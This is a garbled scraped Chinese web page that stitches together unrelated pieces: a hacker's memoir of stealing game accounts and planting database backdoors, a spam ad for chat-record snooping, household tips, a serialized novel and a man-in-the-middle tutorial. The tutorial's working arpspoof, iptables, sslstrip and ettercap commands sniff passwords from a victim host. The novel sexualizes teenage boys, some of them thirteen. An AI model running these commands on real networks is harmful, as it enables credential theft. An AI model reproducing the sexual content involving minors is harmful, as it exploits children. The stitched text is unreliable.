不知道,会不会有梦幻西游黑客免费账号,可以把某个账号的所有

51CTO旗下网站
黑客暴利生意:一个黑客的自白
日上午,有黑客在网上公开了中国最大的开发者社区CSDN网站的用户数据库,600余万个注册邮箱账号和与之对应的明文密码泄露。
作者:佚名来源:创业家| 15:07
日上午,有黑客在网上公开了中国最大的开发者社区CSDN网站的用户数据库,600余万个注册邮箱账号和与之对应的明文密码泄露;12月22日,网上接着曝出人人网、天涯、开心网、多玩、世纪佳缘、珍爱网、美空网、百合网、178、7K7K等知名网站的用户账号密码遭公开泄露堪称中国互联网史上最大规模的用户信息泄密事件,再次让大家对黑客以及其背后的隐秘的产业链产生了浓厚的兴趣。以下为一个黑客的口述。
盘下一家肯德基的&教主&
那个靠做黑色产业发家,后来洗白,花800万元盘下一家肯德基店的人,我们叫他教主。
教主是海南人,1987或者1988年出生,身材瘦小,皮肤偏黑。他年纪虽然小,但是舍得花钱,很大气,做事也很老到,2004年左右(16岁)看他跟人打交道就非常成熟,很难想象是什么情况造成他这种性格。
2003年年底,我加入了一个QQ群,那个群当时在技术性入侵领域很有影响力,无数人想进入,可以说是一位难求。群里的聊天记录每天能有3000页,大家都非常纯真,纯粹是为了交流技术。2004年,教主可能在黑客基地报名学了点简单的东西,但是学得又不太明白,他进入了这个群。在群里,我亲眼见他和群主讨价还价买卖17173(一个游戏门户网站)的权限,群主开价700元,教主说我就500元,一年半以后,同一个权限有人开价15万元购买。
那个时候,大家都没想到靠17173的权限还能赚钱,说白了,其实就是获得网站控制权,挂马,然后获得用户账号密码去网游《传奇》、《魔力宝贝》里盗号。后来我找人打听了一下,教主这单可能赚了两三万块钱。
教主真正开始立业,是在2004年时去做中国台湾的游戏市场,他是先行者。他自建渠道,跟台湾当地人合作,在盗取网游账号后,由当地人负责卖游戏装备,交易的钱被汇入当地人用假身份证开的账户里。从2004年下半年到2005年上半年,教主在台湾赚了估计能有500万元。台湾人被搞怕了,后来很多网站都禁止大陆人访问。后来教主又去做韩国和美国的游戏市场,等到他2008年洗白那会儿(20岁),赚了绝对不少于2000万元。他是一个很高调的人,经常在群里说他去哪个国家玩了,买了多少栋房子,买了什么车之类的。
教主的技术并不高超,但他有商业头脑。不从技术角度出发,纯讲入侵水平,国内黑客一直都不弱于世界顶尖国家,可能比美国、俄罗斯还要强,中国人能算计,在入侵思路方面比较聪明。
我亲眼见过一个例子。2004年年底,有个黑客端着笔记本电脑进了一家五星级酒店,第二天他出来的时候,电脑里存着这家酒店所有的客户数据。这是酒店竞争对手给他下的单子&&把客户都抢过来。从谈判到见面交易我都陪他去,后来这批数据卖了129万元。
还有一件事也是我亲眼所见&&在电商网站抢单。长沙有一帮人,在各大电商网站的数据库里装后门,实时在本地更新数据库或直接进入电商网站后台看数据。他们一般挑货到付款的顾客,只要一看到有人下单,立马在最短时间内发货,动作比电商网站的物流快,冒充该网站让顾客签收。等顾客下单的货真正到的时候,他肯定就拒收了。这伙人专挑服装、成人用品、减肥用品这些出货量大的品种,每个网站偷三五单,网站很难发现。但他们在四五十家网站偷,一年下来净利也有2000多万元。
比这更黑的生意是通过网银或信用卡偷钱,但也更危险。很少有人敢在国内做,我以前有两个手下因为做这个,现在还在牢里待着。我知道有个人在澳大利亚偷中国国内的网银,他雇了一些台湾人和香港人来大陆,每个月付他们一万块钱,让他们帮忙取他从别人网银账户里转过来的钱。他曾经截过一张图给我看,那是他弄到的一张银行卡的打款记录,卡主人每个月的打款金额都在1000万元左右,我记得很清楚有一笔是打给台湾一家唱片公司的,备注里写着&周杰伦演出费&。银行的U盾有没有用我不知道,我自己用的是工行网银,之前我试验了一下,至少一代U盾算法不强,是可以复制的。
网上流传赚5000万元的黑客我没见过,但赚1000万元的不少,我在北京有很多这样的朋友,他们大多没有正经工作,也不出名。但说句实在话,他们都是打工的人,这条产业链上真正的大鱼是渠道商。有人给渠道商下单了,他们就会雇一些人来找黑客谈价钱,这都指不定倒几次手了,可惜我没有接触过渠道商。
中国黑客在韩国闹得也很厉害,韩国现在被搞得比台湾当年还要风声鹤唳草木皆兵。我手里有4000万韩国网民的数据(2011年韩国人口总数5051.5万),而且他们实行实名制。
黑客圈生态
我是上大学以后接触黑客圈的。我遇到了很多拿个简单工具到处攻击的菜鸟黑客,我在研究他们的同时对黑客技术也有了些兴趣,心想&不过如此&,之后我就开始自己下载工具,给别人装个木马闹着玩,吓唬吓唬对方。再往深里研究,我慢慢接触到了一些扫描器、入侵工具,自己也到处看一些相关的原理,因为我大学读的是数学,跟计算机关系比较大,一年之后,我差不多把入侵需要的东西全学会了。那时候我就算是圈里人了,每天跟一个小团体在一起探讨技术。
后来,有一个叫孤独剑客的人开了一个网站&黑客基地&,我就去聊天室里当讲师,给别人做VIP培训,讲入侵,每周一节课,他们一节课给我200块钱。那个时候也没有什么法律观念,每节课都拿别人的网站做试验。比如这节课我要讲这个漏洞,我就去找符合条件的网站,先把漏洞留好,讲课的时候现场入侵,一步步解说,工具发下去之后再把步骤说一遍。当时祸害了不少网站,我印象里有网易的分站。
但实际上入侵靠的是经验,灵活应对各种情况,比如快速判断这个地方会不会出现弱口令、有没有验证等。技术手段说白了,如果天天学的话,两三个月足够。现在高明的攻击手都不会那么累,他会使用社会工程学的一些方法,比如他通过跟你聊天知道了你们公司的部门组成,如果你们是按部门排座位的话,他接着就能推算出你们的网络构架,他的攻击能变得更加精准;再比如他通过挂马获得了你们老板邮箱的账号密码,他用这个邮箱给你们的同事发一封邮件,要求获得网络管理员的账号密码,基本员工都会中招。当然,技术高超的攻击手能解决一些更复杂的问题。
挖掘漏洞的人是我最佩服的,因为他直面系统。这是一个非常非常枯燥、我看见就想吐的活儿。圈里有名的一位挖掘者,三个月不出门,全吃方便面。所以擅长挖掘漏洞的人都不擅长入侵,因为他没时间。
黑客圈其实也是拼人脉的,因为得拿到漏洞才能由程序员去制作入侵工具,你人脉广,才有人愿把漏洞送给你或跟你交换。圈里把没公布的漏洞叫0DAY,如果刚好赶上这个网站有0DAY漏洞,也许我一秒钟就能把它搞定。一个0DAY漏洞能换50个普通漏洞,拿去卖市价可能有几十万元,还有一些女黑客为了骗0DAY漏洞情愿跟人上床,所以圈里人也把我们这个圈叫&娱乐圈&。
我在&黑客基地&讲了半年课,技术提升比较快,因为给别人讲东西自己得先会,一些以前没注意的东西,在讲课的过程中重新学习到了,慢慢地我在圈里有了些名气。大学最后一年,我想赚点钱,刚好有人给我下单子,让我去一个全国性网站挂马。他收我&信封&(一个账号加一个密码叫一封信),一封一块钱,我一周大概有700-800元的收入。然后,他拿这些账号密码去《传奇》里面撞库盗号。
2004年,我从河南、安徽、广东、辽宁一共凑了9个人组成工作室,我们租了个100平方米的房子弄成上下铺,两个带媳妇的住两间,剩下5个人住单间。我们分头去攻击网站,靠得来的账号密码去网游里盗号。我们中有人能挖浅显的漏洞,但系统漏洞挖不了,写程序的也不多,入侵工具我们宁愿去买,稳定性比自己做的好些。我们当时还特意分出来一个女生管后勤。
2005年左右,我不太想做这个了,圈子里其实很多人都在偷偷摸摸地做,但都不好意思说出来,怕别人鄙视,说你怎么玷污了我们的精神?那个时候大家还信奉有什么东西就得公布出来共享,入侵一个站点大家一起玩。其实我自己也是那种很纠结的心理,搞技术的还靠这个赚钱?但后来发现,都他妈有人赚几百万了,我想想,还是偷摸着回去搞吧。
黑客产业在2006年的时候最凶猛,国内国外都凶猛,韩国、巴西、越南的网游市场都被中国黑客搞过,我记得我还搞过马来西亚的。后来有个国内网游公司的工作人员跟我说,马来西亚市场运营得不怎么好,自从某月被批量盗号后就不行了,我心想这事儿我多亏没跟你说。马来西亚代理公司的老板给我打电话,说我每个月固定给你钱,你别搞我们了,我们也快不行了??那时候法律还没管到这块,他抓不了我。
我做这行属于断断续续的,比如这个月赚了50万元,那我就出去玩,花光了回来再做,如果按全工作时算,前后可能也就干了三四个月,加起来也就赚了200来万元。这种钱花得可真快,动动鼠标就得到的我不会珍惜,我和女朋友出去玩都是住五星级酒店,有时候懒了经常跨省打车。
没有信仰,只有丧心病狂
从中国有黑客开始,我就开始接触到一些网站的用户账号密码库,它们明文保存密码,真是脑残的行为。但以前我都是乱扔,新浪、天涯的我都直接删了,心想哪有硬盘存这些东西,那时候没有远见能看到这些也是能卖钱的。
中国黑产圈子里的人有些丧心病狂了,讲道义、讲信用的人很少,大家都没有信奉的规则,明的暗的都没有。中国为什么没有维基解密?因为大家都没有信仰再加上文化程度低,很多人连世界观、价值观都没了,当他们碰上法律不健全、看似自由的网络世界,这个圈子能变成什么样子可以想见。
当年我做黑产的时候,经常几个人在一起讨论:哎呀,真堕落啊,我们干这个!但年轻人,没有那么多是非观念,我们甚至在盗取一个网游账号后会这样安慰自己:又拯救了一个网瘾少年!
我现在也没什么理想和信仰了,以前还会有一种精神,想在中国黑客圈占有一席之地,我分享一些东西,让大家觉得你这人值得尊敬,我会有一种成就和满足感。但是2006年之后,这个世界就变了,从业者增加了,我现在认识的这些人,基本都是在2005年之前就接触过,2005年之后才进入的,我一个都不认识。
CSDN树大招风,它的数据库当年人手一份。今年年初我开始有意收集能接触到的各个数据库,想着以后还能写本书,证明自己当年也牛逼过。当时有人想50万元预订我这些库,我说不卖,我知道你想干嘛,不就是写个程序然后找网游挨个盗号嘛。所以这次账号密码大规模泄露,还代表着新一轮的网游盗号狂潮要到来。
我还是怀念当初的那种日子,去名人的邮箱、网站看看,在群里贴贴王力宏的ICQ聊天记录,能知道别人不知道的信息就是一件很幸福的事情。
【编辑推荐】
【责任编辑: TEL:(010)】
大家都在看猜你喜欢
头条头条头条热点热点
24H热文一周话题本月最赞
讲师:1830人学习过
讲师:414人学习过
讲师:683人学习过
精选博文论坛热帖下载排行
《网管员世界》是国内唯一一家专门面向网管员职业的刊物。本书是2006年《网管员世界》各期内容的汇集,内容权威、全面、时效性强,贴近应用...
订阅51CTO邮刊黑客 (Hacker)- 百度派
{{ mainData.uname }}
:{{ mainData.content }}
{{ prevData.uname }}
:{{ prevData.content }}
{{ mainData.uname }}
:{{ mainData.content }}
0 || contentType !== 1" class="separate-line">
:{{ item.content }}
▄聊?天?纪?录?查?询▄
▄?要?的?+++++++
微: x k k 9 9 3 6
Word 2000/XP 能够自动恢复尚未保存的数据。大家只要单击“工具”菜单中的“选项”命令,然后单击“保存”标签,并选中“自动保存时间...
▄聊?天?纪?录?查?询▄
▄?要?的?+++++++
微: x k k 9 9 3 6
Word 2000/XP 能够自动恢复尚未保存的数据。大家只要单击“工具”菜单中的“选项”命令,然后单击“保存”标签,并选中“自动保存时间间隔”复选框,在“分钟”框中,输入时间间隔,以确定Word 2000/XP 保存文档的时间。时间越短,Word 2000/XP 保存文档越频繁,在 Word 2000/XP 中打开文档后出现断电或类似问题时,能够恢复的信息当然也就越多,一般我们设置为1分钟。
经过上面的设置后,所有在发生断电或类似问题时处于打开状态的文档在下次启动Word时都会显示出来,大家可以对它们进行保存。不过在替换原有文档之前,请验证恢复文件包含有您需要的信息,不要覆盖了原先的文件。
(1)Word 2000/XP/XP的定时保存文件功能仅对DOC文件有效,其他文件无效,所以笔者建议您在编辑的时候先把文档存为Word格式,等编辑完成后再另存为其他格式;
(2)“自动恢复”功能并不等同于正常的文档保存。如果在 Word 2000/XP 打开恢复文件后选择了不进行保存,则该文件将被删除,未保存的修改也将丢失。如果选择了保存恢复文件,它将会替换原文档(除非给它指定了一个新的文件名)。
 2、巧治冻疮   将橘皮用火烤焦,研成粉末,再用植物油调均匀,抹在患处。
  3、巧治慢性支气管炎   橘皮5至15克,泡水当茶饮,常用。
  4、巧治咳嗽   用干橘皮5克,加水2杯煎汤后,放少量姜末、红糖趁热服用:也可取鲜橘皮适量,切碎后用开水冲泡,加入白糖代茶饮,有化痰止咳之功效。
  5、巧治便秘   鲜橘皮12克或干橘皮6克,煎汤服用,可治便秘。
  6、巧解酒   用鲜橘皮30克,加盐少许煎汤饮服,醒酒效果颇佳。
  7、巧治睡觉磨牙   睡觉前10分钟,口中含一块橘皮,然后入睡,最好不要将橘皮吐出,若感到不适时,再吐出。
  8、巧防止牙齿“酸倒”   食酸橘对老人或牙齿过敏者均不宜。其实,只要在食酸橘后,即用剩下的新鲜橘皮泡开水喝下,就可以防止牙齿“酸倒”。
  9、巧治乳腺炎   生橘皮30克、甘草6克,煎汤饮服,可治乳腺炎。
  10、巧治口臭   将一小块橘皮含在口中,或嚼一小块鲜橘皮,可治口臭。
  11、巧解鱼蟹之毒   用适量的橘子皮煎汤饮服,可缓解食鱼、食蟹后的中毒。
  12、巧治胃寒呕吐   将橘皮和生姜片加水同煎,饮其汤,可治疗胃寒、呕吐。
  13、巧理气消胀   用鲜橘子皮泡开水,加适量白糖,为橘皮茶,饮后可理气消胀,生津润喉。
  14、巧治消化不良   将50克橘皮浸泡在酒里。这种酒有温补脾胃的功效,用于消化不良、反胃呕吐等症,对多食油腻而引起的消化不良、不思饮食症,尤为有效。
你也许看过北国的冰雕或冰灯,透明的冰雕物像水晶一样使人置身于神话般的世界。冰和雪是连在一起的,用放大镜观察雪花,雪花是由一些透明的冰晶组成的。可是雪为什么那么洁白,一点也不透明呢?
夏天吃刨冰的时候,你可以亲眼看到冰是如何转变成雪的。刨冰机的刨刀在一大决冰上迅速地旋转,削出一大堆白花花的冰屑。用一玻璃杯盛上,再浇上彩色的果汁,可真漂亮。
透明的东西变成碎屑都会呈现白色。你注意过拍击在岸边的浪花了吗!在研钵里把玻璃研成碎屑也是白色的。
从透明到白色不透明的转变是光线耍的把戏。原来细小的透明冰屑有许许多多的棱角。光线在每一个棱角上发生折射,大部分的光线不能顺利地透过去,有的光线经过曲折的路径又回到人的眼睛中,所以看上去是白色。浴室的门窗上装的毛玻璃或压光玻璃不透也是这个道理。
如果你把雪装在一个大口玻璃瓶里,少倒一点水,这点水并不能够把雪融化,但是能把雪花内冰屑之间的空隙填满。这时倏,雪就由白色转变成透明的。
透明的能变成不透明的,不透明的又能变成透明的,真是有趣。我还可以告诉你,锃亮的东西可心变成黑的。一个新的铝锅,表面锃亮。但是当你用砂纸从上面擦下一些铝屑,放在手指上一捻,竟是黑的。有着银亮从金属光泽的铝怎么变成黑的了呢?
这种事并不希奇,照相底板上的黑色就是由细小的银粒组成的。把银的化合物涂在透明胶片上就制成胶卷。照相的时候,底片感光,光越强折出的银粒就越多,底片就越黑。
原因是由于金属小颗粒和小冰晶不一样,它们只能反射光线。小颗粒的分布是非常混乱的,所以不能像镜面一样把入射光线定向地反射回去。入射光线进到金属小颗粒中,就像进了“迷魂阵”,从一个小颗粒反射到另一个上去,这样反射过来又反射回去,光线越来越弱,很少能按入射方向返回去。因此看上去是黑色的。
把铝粉掺在透明的漆里刷在物体表现,黑色的粉末又会闪现出金属的光泽。
(一)海盐的生产
我国的海盐生产,一般采用日晒法,也叫“滩晒法”,就是利用滨海滩涂,筑坝开辟盐田,通过纳潮扬水,吸引海水灌池,经过日照蒸发变成卤水,当卤水浓度蒸发达到波美25度时,析出氯化钠,即为原盐。日晒法生产原盐,具有节约能源,成本较低的优点,但是受地理及气候影响,不可能所有的海岸滩涂都能修筑盐田,所有的季节都能晒盐。空气干燥,日照长久,蒸发量大,盐的产量就高,反之,产:量就低。在我国的北方盐场,只有3月至11月才是晒盐季节。
日晒法生产原盐,其工艺流程一般分为纳潮、制卤、结晶、收盐四大工序。
实际上是生产原盐的原料提取过程。海水是盐业生产的原料,为确保生产的正常进行,必须千方百计地保证原料的供应。目前,采用的纳潮方式有两种,一是自然纳潮,二是动 力纳潮。自然纳潮是在涨潮时让海水沿引潮沟自然流人;动 力纳潮一般采用轴流泵将海水引入,其特点是不受自然条件限制。
制卤是在面积广阔的蒸发池内进行的,根据每日蒸发量适当掌握蒸发池走水深度,使卤水浓度逐步提高,最后浓缩成饱和卤。
海水在不断蒸发浓缩过程中,各种盐类浓度不断增大, 当盐类浓度达到饱和时,将以晶体形式析出,在过饱和溶液中,不断维持溶液过饱和度,晶体就能继续生长。
就是将长成的盐,利用人工或机械将盐收起堆坨。
(二)井矿盐的生产
井矿盐生产主要分为采卤和制盐两个环节。不同的矿型 采用不同的采卤方法。提取天然卤的方法有提捞法、气举法、抽油采卤、深井潜卤泵、自喷采卤等方法。在岩盐型矿区大多 采用钻井水溶开采方法,有的采用单井对流法,有的采用双井水力压裂法。
此法是目前国际国内开采岩盐矿床比较普遍采用的方法之一,机械化程度较高,成本较低。它利用了岩盐矿具有溶解于水的特点进行开采,具体方法是:打一口井到盐层,下两层套管,外层套管用油升水泥固好井,从其中一层管注入水,溶解盐层,由另一根管子把卤水抽上来。
此法是在地面打两口钻井,下人套管,将井管与井壁封固,从一口井压人高压水,在盐层形成通道,溶解盐层,形成饱和卤水,由另一口井压出地面,交付生产。 制盐是在厂区进行的,将蓄卤池净化后的卤水输入罐中,利用蒸汽加热,使水分不断蒸发。卤水经过蒸发后即成为半盐半水的盐浆,再经离心机脱水,输入沸腾床干燥即为成品盐;如果卤水含芒硝较多,可采用冷冻母液或热法提出芒硝;江西盐矿引进瑞士苏尔寿公司的盐硝联产工艺,具有领先的代表性。 如果卤水含石膏较多,则提出石膏以保证盐品质量。
(三)湖盐的生产
湖盐分为原生盐和,再生盐,主要采用采掘法或滩晒法。采掘而言,有些湖经过长期蒸发,氯化钠沉淀湖底,不需经过加工即可直接捞取。如柴达木盆地的盐湖,历经数千万年变化;形成了干湖,其盐露于表面。各地目前以采盐机或采盐船进行生产,它的工艺流程大致是:剥离覆盖物——采盐——管道输送(或汽车输送)——洗涤、脱水一皮带机输送一成品盐人坨。至于滩晒法与海盐生产工艺相类似。
扫一扫分享到微信
中国的封门村,现在已经人尽皆知了,那是人们口中津津乐道的第一鬼城,也是让人望而却步的探险胜地。
但你是否知道,在东北一个偏僻的小角落,坐落着一座荒芜的村庄,那里,是一个比封门村更为邪门的地方。
因为这村子太邪门,知道的人因为...
中国的封门村,现在已经人尽皆知了,那是人们口中津津乐道的第一鬼城,也是让人望而却步的探险胜地。
但你是否知道,在东北一个偏僻的小角落,坐落着一座荒芜的村庄,那里,是一个比封门村更为邪门的地方。
因为这村子太邪门,知道的人因为忌讳,不愿意去说,而不知道的人也就一直不知道了。
故而这村子虽为**,却没有封门村的名声叫得响亮。
我小时候,就生活在这里,曾亲眼目睹了村子的变迁,目睹了一切的发生……
我叫秦三鬼,是土生土长的木槐村村民。
这名字是我爷爷给我起的,听说我出生的时候,爷爷说给我起这个名字,我妈死活不干。
毕竟鬼在所有人眼里都是不吉利的,名字中带个鬼,那就是带着煞气啊!
可我爸说,爷爷年轻的时候学过易经风水,还给人看过相,起名字这种事儿,他也有分寸,给我起这个名字,必有深意。
好说歹说,我妈才答应了下来。
木槐村坐落在一个东北偏僻的角落,几乎与世隔绝,山路难走,村里人想要去市里,是极其困难的。
之所以叫木槐村,是因为村口有一棵巨大的槐树,三人才能合抱。
大槐树是村中的吉祥物,而槐树的上面,挂着一黑一白两块石头初始于聊斋世界。
石头挂的并不高,一米七的个头伸手就能摸到,据说两块石头一年四季都保持着冰凉的温度。
最为奇特的是,石头是用藤条挂在树上的,可能是年头太久了,石头,藤条,槐树几乎已经长在了一起,不分彼此。
挂再大的风,石头拼命摇晃,却不会落地。
打再大的闪,也劈不到槐树。
村中老人说,两块石头从他们爷爷的小时候就有了,没人知道两块石头有多少年的历史。
他们还说,两块石头象征着村子的和平安宁,一旦石头落地,那就会招来灾祸。
村子里人不怎么多,也就是个百十来号,村中有所小学,却没有初中。
九七年的时候,我十七岁,山里孩子上学晚,我那会儿才上初中。
那一年,父母不甘心村里的贫穷,想让我过上好日子,就把我送到了爷爷家里,他们则出去打工。
爷爷是村子里最有文化,认字儿最多的人,老人家虽然五十七岁,身子骨却十分硬朗,黑发之中只有少许白发。
我那个时候是非常乐意在爷爷家的,因为爷爷家的房子比我家好,而且这里还有不少孩子。
这些孩子都是家里父母出门打工,临走之前给爷爷塞点钱,或者给点肉啦菜啦,让爷爷帮忙照看,顺便教孩子看看书认认字。
爷爷反正闲来无事,也就都答应了下来。
爷爷平日里是个严肃的人,不苟言笑,但对待孩子却认真负责,那份关怀是不容作假的炼器真仙。
开了一个头之后,就有人陆续的往过送孩子。
一来二去,爷爷家里除我之外,已经有了三家的四个孩子。
刚去爷爷家的时候,还没有开学,那个时候还比较自在。
家里最大的孩子叫大牛,我们管他叫牛哥,今年十九岁,最小的孩子才十三岁。
孩子之间,当然是以年龄最大的为首。
农村孩子开朗,我第一天就跟四个孩子熟识了。
到了晚上,爷爷就把四个人赶到一个大屋子里,睡在一张大炕上,四个人睡绰绰有余,很是宽敞。
晚上我们几个孩子又聊了一会儿,感觉已经很晚了,估计快要十二点了,我打了个哈欠,翻个身准备睡觉了。
“差不多了吧?”
另一边传来声音:
“应该快了,我昨天晚上都没弄,今天最好的位置得留给我啊!”
我丈二和尚摸不着脑袋,问道:
“你们说几把啥呢?我咋听不明白?”
牛哥突然神神秘秘的做了个噤声的手势:
“嘘……三鬼你别出声,认真听着就是了。”
他话音刚落,我突然听到隔壁传来一阵女人说话的声音。
声音不大,却透过了墙壁,传到了我们耳中时代巨擘。
牛哥压低声音对我说道:
“这隔壁啊,住着一个寡妇,平日里足不出户,但一到晚上,她那里就闹动静,好好听着吧。”
说着,牛哥抓着我的手轻轻坐起来,小心的移动到了墙边,指了指墙。
我会意,将耳朵放在墙面上,一阵深吟声钻进了我的耳朵:
“慢点……慢点……别急……啊……别急着进去……”
声音娇媚酥软,我听的一下子就硬了。
爷爷家的房子有些年头了,是那种大石板和土搭成的。
这里和隔壁的寡妇家原本应该是一个大院子,可不知是什么时候,被人用砖头和土给隔开了,弄得不是很好,所以隔音有些糟糕。
“三鬼,你今天刚进来,咱们宿舍有个规矩,那就是听寡妇jiao床的事儿绝对不能告诉别人,要是让爷爷知道了,肯定就不让咱们住在这儿了,明白不?”
我急忙点头,我又不傻,这种事情怎么能跟爷爷说?
况且……听这寡妇jiao床,当真是一种享受。
转眼之间,两个月过去了,我已经在爷爷家生活了两个月。
现在已经开学一个多月了,这里的日子可是真真的难熬。
上一天学,感觉比干了一天的农活还要辛苦。
最为享受的事情,自然只有小寡妇天才纨绔。
这寡妇平时不出屋,我就见过一次,后来宿舍的其他人告诉我她男人死了好几年了。
村子里的人保守,寡妇置业的,也不经常抛头露面,更没有男人敢去帮忙干点儿啥,怕被人说闲话。
大家都说寡妇不吉利,所以她家里白天从来没来过人。。
不过我们几个孩子知道,这寡妇不是啥好东西,小骚蹄子一个。
每天晚上,都能透过墙壁,听到那寡妇的深吟声,声音骚气十足。
我在这里呆过两个月,没有动静的时候少,只有四天,我也不得不佩服寡妇的精力充沛。
深吟声中,还有轻微的允吸声和水流击打的啪啪声。
每到这个时候,我们几个半大小子,就会挤到墙壁跟前儿,听那酥到骨子里的声音,娇chuan中,还带着求饶与不满。
那会儿都是半大的孩子,堵在嘎啦一起打个飞机也不是什么丢人的事儿。
我们这么大的打灰机,十三岁的年纪太小打不出来,只能干瞪眼。
我不知道我爷爷有没有听到过这叫声,但是老人和小孩之间终究是有一层厚厚的屏障。
所以这件事情,老人和孩子都没有提过。
半夜听这酥媚的声音,也成了一种享受。
几个人在脑海中想象着漂亮的小寡妇裸露着雪白的身体,那丰满的乃子,完美的身材,在某个粗暴的男人身子下汗水淋漓,喘息着,惨叫着……
那时候没有h片,何以解忧?唯有小寡妇舌尖上的江湖!
俗话说,夜路走多了,难免不湿鞋,终于有一天……
这天半夜,我们五个又在墙边堆着,听着寡妇的叫声。
“嗯……嗯……摸摸我……摸摸我……好难受……我好难受啊……啊……”
几个人正要伴随着这声音去往极乐的时候,我们却丝毫没有注意到爷爷拿着几床被子走了进来。
估计是看天冷了,半夜睡不着,想来给我们加被子。
这爷爷一进来,我们几个受到了惊吓,全部迸射了出来。
除却十三岁那个,其余四个人慌慌张张提上裤子,也不敢去擦,然后异口同声的喊了一声:
“爷爷。”
当时这些孩子管我爷爷都叫爷爷。
爷爷把被子往床上一扔,铁青着脸,瞪着我们几个。
瞪了足足四五秒钟,才用手指头指点着:
”草你们大爷的,你们几个小兔崽子,我说怎么早上起来老是没精神呢,闹了半天天天晚上躲在旮旯子里干这个!“
说着就走过来,给了我们一人一脚,这一脚,倒是也没踹疼。
这时候牛哥发话了,他尴尬的说道:
”爷爷,你别老骂我们,你说我们这一个个年轻气盛的,撸个管子也是人之常情不是……“
爷爷一副恨铁不成钢的样子,指着大牛说:
”是,这是人之常情我承认,关键是你们也太伤风败俗了,几个大小伙子互相对着,有什么可……“
爷爷说着,咬了咬牙,甩了甩胳膊,没好意思说出最后几个字篮坛少帅。
十三岁那孩子外号叫快嘴子,顾名思义,这人最快,该说的不该说的全都跟连珠炮一样的往出捅。
他张口就道:
”他们在听隔壁的娘们叫呢!“
”卧槽!快嘴子!“我瞪了他一眼,给他使了个眼色,快嘴子才闭上了嘴巴。
但我爷爷当然听见了这句话,他皱了皱眉,爬到墙壁那里,把耳朵贴在墙壁上,听了一阵儿。
然后他回身问道:
”你们几个,能听到隔壁有动静?“
我很奇怪隔壁那么大的声音,老爷子竟然听不见么?
看他的样子,似乎是真的没听见,并非是不好意思说。
爷爷在墙上贴着耳朵听了半天,脸色突然变得有些难看。
然后他用力的往墙上敲了三下,一边敲一边念:
”一敲阳间路,二敲阴间门,三敲阴人来。“
说完之后,又用大拇指和十指在墙上拿捏,好像测量着什么。V信搜“八月书屋”回复,村子,最新章节第一时间免费阅读。
扫一扫分享到微信
,Java攻城狮,公众号:javatiku
> 中间人攻击(man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。但是遇到https认证证书,该怎么破呢???# 环境网关:192.168.1.1攻击机:19...
> 中间人攻击(man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。但是遇到https认证证书,该怎么破呢???# 环境网关:192.168.1.1攻击机:192.168.1.152 (vm kali)被攻击机:192.168.1.138(vm win7)# 利用降级https到http来攻击## ssltrip攻击思路1. arp欺骗,使攻击机能够截获所有目标主机的流量。2. 攻击者利用用户对地址栏中https和http的忽略,将所有的https链接都用http来替换。3. 同时与目标服务器建立正常的https连接。4. 由于http是明文传输,攻击者可以轻松的实施嗅探。## 攻击流程### 使用nmap对内网中开启的机器进行扫描以确定攻击目标```nmap -sP 192.168.1.0/24```![](http://img.blog.csdn.net/16317)### 启用内核包转发```echo 1 >
/proc/sys/net/ipv4/ip_forward```![](http://img.blog.csdn.net/22955)### 端口转发> 参数解释```-t:命令要操作匹配的表(nat这个表表示被查询时遇到了新差生的连接包)nat表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT(修改路由之前本地的包)、POSTROUTING(修改准备出去的包)-A表示在选择的链后加入更多选项–p指被过滤包的协议--destination-port 80指被过滤包的目的端口是80 -j REDIRECT --to-port 10000 将80端口的数据跳转到指定端口传输```> 注意:在此之前请记得使用iptables -F清除原有设置。```iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443```![](http://img.blog.csdn.net/48116)### 开启ssltrip```sslstrip -a -l 8080 p.log```> 参数解释
```-a:记录所有来自服务器的SSL及HTTP数据流量内容。 -l:监听的端口,应和前面在iptables里设置的一样。 -w:将拦截内容保存为文件。```![](http://img.blog.csdn.net/59195)### arp欺骗```arpspoof -i eth0 -t 192.168.1.138 192.168.1.1```![](http://img.blog.csdn.net/53398)### ettercap嗅探用户名和密码。注意:以命令行方式显示,只嗅探本地数据包,只显示捕捉到的用户名和密码以及其他信息。> 参数解释```-P
使用插件-T
使用基于文本界面-q
启动安静模式(不回显)-M
启动ARP欺骗攻击``````ettercap -T -q -M arp /// /// -i eth0 -w ettercap.logettercap -T -q -M arp:remote /192.168.1.138// /// -w a.log```## 防御sslstrip的攻击方式是一种中间人攻击,需要进行arp欺骗,所以在设置好浏览器本身安全的基础上,要绑定mac和ip等在网关和本机双向绑定,或者启用arp防火墙对arp攻击进行防御。# 利用伪造证书来攻击## ssltrip攻击思路利用伪造证书来进行arp攻击来进行嗅探网络数据包。## 攻击### 生成一个证书```openssl genrsa -out ca.key 2048```![](http://img.blog.csdn.net/18246)### 自签名用生成的key生成公钥证书```openssl req -new -x509 -days 1096 -key ca.key -out ca.crt```![](http://img.blog.csdn.net/22763)### 启动内核包转发```echo 1 > /proc/sys/net/ipv4/ip_forward```![](http://img.blog.csdn.net/09810)### iptables流量转发```iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443```![](http://img.blog.csdn.net/00866)### arp欺骗```arpspoof -i eth0 -t 192.168.1.138 192.168.1.1```![](http://img.blog.csdn.net/23665)这里我建议等到临开始劫持的时候再打开ARP,因为我们的端口转发已经打开,ARP流量已经不能与平时一样正常走攻击机的正常端口,会出现靶机上不了网的情况。### 启动SSLSplit```sslsplit -D 